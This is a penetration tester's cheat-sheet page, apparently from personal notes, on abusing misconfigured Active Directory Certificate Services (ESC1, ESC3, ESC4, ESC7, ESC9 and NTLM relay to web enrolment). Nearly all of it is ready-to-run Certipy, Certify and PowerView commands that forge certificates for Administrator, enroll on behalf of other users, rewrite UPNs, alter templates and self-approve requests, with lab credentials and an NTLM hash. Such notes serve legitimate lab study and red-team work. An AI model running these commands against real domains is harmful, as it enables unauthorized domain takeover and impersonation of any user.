AD Certificate Services

This ESC allows us to specify an alternate SAN for the request on behalf of any other domain user.
- certipy-ad req -username 'sam' -password 'asdf123' -dns dc01 -target-ip 10.10.176.149 -ca DC01-CA -template 'ESC!' -upn 'Administrator@hybrid.vl' -key-size 4096
- .\\Certify.exe request /ca:LAB-DC.lab.local\\lab-LAB-DC-CA /template:ESC1 /altname:administrator@lab.local
Check for which groups may enroll, such as Domain Computers
- Check keysize and auth formatting
- DNS name may be necessary - just set up hosts

Certificate Request Agent EKU. Will create a certificate we can use to request ANY OTHER TEMPLATE on behalf of another user.
Request ESC3 template
- certipy req -u 'blwasp@lab.local' -p 'Password123!' -ca 'lab-LAB-DC-CA' -template 'ESC3'
Request any template on behalf of another user, including built-in User
- certipy req -u 'blwasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template 'User' -on-behalf-of 'lab\\administrator' -pfx blwasp.pfx

If EDITF_ATTRIBUTESUBJECTALTNAME2 is set on the CA - the enrollee may supply subject names to any certificate.
You can ESC1 for ANY template

If strict mapping is not in place (StrongCertificateBindingEnforcement is not 2, or CertificateMappingMethods is 0x4 for the cert) and we can write to an account’s UPN, we may use the victim account to request a cert on behalf of anyone.
Update owned account’s UPN
- certipy account update -u 'BlWasp@lab.local' -p 'Password123!' -user user2 -upn user3@lab.local
- Set-DomainObject user2 -Set @{'userPrincipalName'='user3@lab.local'} -Verbose
Request cert with owned user
- certipy req -u 'user2@lab.local' -hashes 2b576acbe6bcfda7294d6bd18041b8fe -ca lab-LAB-DC-CA -template ESC9
Revert UPN and auth
- certipy account update -u 'BlWasp@lab.local' -p 'Password123!' -user user2 -upn user2@lab.local

Essentially just ESC9.
ESC9 abuse may be used as a computer account for RBCD or a user account for account owns.

If you have valid DACL entries and control over a template, you may edit it to become vulnerable to ESC1.
- certipy template -u 'BlWasp@lab.local' -p 'Password123!' -template ESC4 -save-old
- certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template ESC4 -upn Administrator

If we compromise any of these, we can win:
- The CA’s AD Computer
- The CA’s RPC or DCOM server
- Any descendant AD object or container in the container CN=Public Key Services,CN=Services,CN=Configuration,DC=<COMPANY>,DC=<COM> (e.g., the Certificate Templates container, Certification Authorities container, the NTAuthCertificates object, the Enrollment Services Container, etc.)
If you have local Admin on CA, just carry out ESC7 below (without adding an officer).

This is a DACL entry abuse one. The issue is that updating EKU and EnrolleeSuppliesSubject keys requires the CA to be restarted before application.
ManageCA to ManageCertificates via Add Officer
- certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -add-officer BlWasp
Submit a SPN cert request (IT WILL FAIL!)
- certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -template SubCA -upn Administrator
Save the request ID and then reapprove
- certipy ca -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -issue-request 31
- certipy req -u 'BlWasp@lab.local' -p 'Password123!' -ca lab-LAB-DC-CA -retrieve 31

AD CS services support HTTP enrolment methods and even includes a GUI. This endpoint is usually found at http[s]://<hostname>/certsrv**.**
You cannot NTLM relay to the originating machine! If CS services are hosted on a single DC, you cannot use this to get a DC$ TGT!

Last updated 4 months ago